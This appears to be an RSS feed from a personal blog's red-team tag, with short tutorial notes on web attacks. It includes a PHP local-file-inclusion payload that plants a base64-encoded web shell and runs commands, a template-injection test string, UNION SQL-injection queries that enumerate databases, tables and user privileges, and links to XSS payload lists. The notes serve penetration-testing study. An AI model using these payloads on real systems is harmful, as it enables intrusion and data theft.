https://slightlymore.co.uk/tags/red-team/Recent content in Red-Team on slightlymoreHugoen-GB<a href="https://creativecommons.org/licenses/by/4.0/" target="_blank" rel="license">CC BY 4.0</a> by Clinton MontagueWed, 29 Apr 2026 21:26:20 +0100https://slightlymore.co.uk/using-php-filters-in-local-file-inclusion/Sat, 24 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/using-php-filters-in-local-file-inclusion/<p>Imagine a PHP file where you can perform LFI such as</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl http://example.com/vuln.php?lang<span class="o">=</span>en.php </span></span></code></pre></div><p>With a badly configured server and app you can use PHP read filters to get the full content</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl http://example.com/vuln.php?lang<span class="o">=</span>php://filter/read<span class="o">=</span>convert.base64-encode/resource<span class="o">=</span>en.php </span></span></code></pre></div><p>You can get a webshell or RCE if <code>allow_url_include</code> is enabled</p> <pre tabindex="0"><code>curl http://example.com?vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&amp;cmd=whoami </code></pre><p>The shell is <code>&lt;?php system($_GET['cmd'];</code></p>https://slightlymore.co.uk/a-string-to-test-for-template-injection-vulnerabilities/Sun, 11 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/a-string-to-test-for-template-injection-vulnerabilities/<p>The following string can be used to test a large number of templating engines in one go:</p> <pre tabindex="0"><code>$ { { &lt; % [ % &#39; &#34; } } % \ . </code></pre><blockquote> <p>[!IMPORTANT] Remove the spaces between each character! I&rsquo;ve included them here because it messes up rendering in some places!</p> </blockquote>https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection/Sat, 03 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection/<p>Using a UNION injection we can find out about a (MySQL/MariaDB) structure.</p> <p>Here are some minimal examples. Remember to <a href="https://slightlymore.co.uk/how-to-determine-the-number-of-columns-for-union-sql-injection">determine the correct number of columns 🌿</a> and match that. Also clearly remember to add <code>WHERE</code> clauses to these to narrow down the search.</p> <h2 id="databases">Databases</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">SCHEMA_NAME</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">SCHEMATA</span><span class="p">;</span><span class="w"> </span></span></span></code></pre></div><h2 id="tables">Tables</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">TABLE_NAME</span><span class="p">,</span><span class="n">TABLE_SCHEMA</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">TABLES</span><span class="p">;</span><span class="w"> </span></span></span></code></pre></div><h2 id="columns">Columns</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">COLUMN_NAME</span><span class="p">,</span><span class="k">TABLE_NAME</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">COLUMNS</span><span class="p">;</span><span class="w"> </span></span></span></code></pre></div><h2 id="privileges">Privileges</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">GRANTEE</span><span class="p">,</span><span class="w"> </span><span class="n">PRIVILEGE_TYPE</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">USER_PRIVILEGES</span><span class="w"> </span></span></span></code></pre></div><h2 id="references">References</h2> <ul> <li><a href="https://slightlymore.co.uk/how-to-determine-the-number-of-columns-for-union-sql-injection">How to determine the number of columns for <code>union</code> SQL injection 🌿</a> </li> </ul>https://slightlymore.co.uk/how-to-determine-the-number-of-columns-for-union-sql-injection/Fri, 02 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/how-to-determine-the-number-of-columns-for-union-sql-injection/<p>A union injection causes additional rows to be added to the result set by using the <code>UNION</code> clause. To do this, we need to know the number of columns in the target result set.</p> <p>There are two easy strategies for this. Using <code>order by</code> or <code>union</code>. Assume that the following is vulnerable:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">users</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">username</span><span class="o">=</span><span class="s1">&#39;$oops&#39;</span><span class="w"> </span></span></span></code></pre></div><h2 id="order-by"><code>order by</code></h2> <p>In MySQL you can use numeric arguments for order by which you can use to infer the number of columns. Let <code>$oops = &quot;test' order by 1 -- </code> then the query becomes:</p>https://slightlymore.co.uk/xss-payloads/Tue, 30 Dec 2025 00:00:00 +0000https://slightlymore.co.uk/xss-payloads/<p>Here are some resources containing XSS payloads:</p> <ul> <li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md" target="_blank" rel="noopener">PayloadsAllTheThings ↗️</a> </li> <li><a href="https://github.com/payloadbox/xss-payload-list" target="_blank" rel="noopener">payloadbox ↗️</a> </li> <li><a href="https://findxss.com/" target="_blank" rel="noopener">findxss ↗️</a> </li> </ul>https://slightlymore.co.uk/installing-seclists-on-kali/Wed, 10 Dec 2025 00:00:00 +0000https://slightlymore.co.uk/installing-seclists-on-kali/<p>The seclists from <a href="https://github.com/danielmiessler/SecLists" target="_blank" rel="noopener">https://github.com/danielmiessler/SecLists ↗️</a> can be installed on Kali using apt</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">apt install seclists </span></span></code></pre></div><p>They&rsquo;re installed into <code>/usr/share/seclists/</code></p>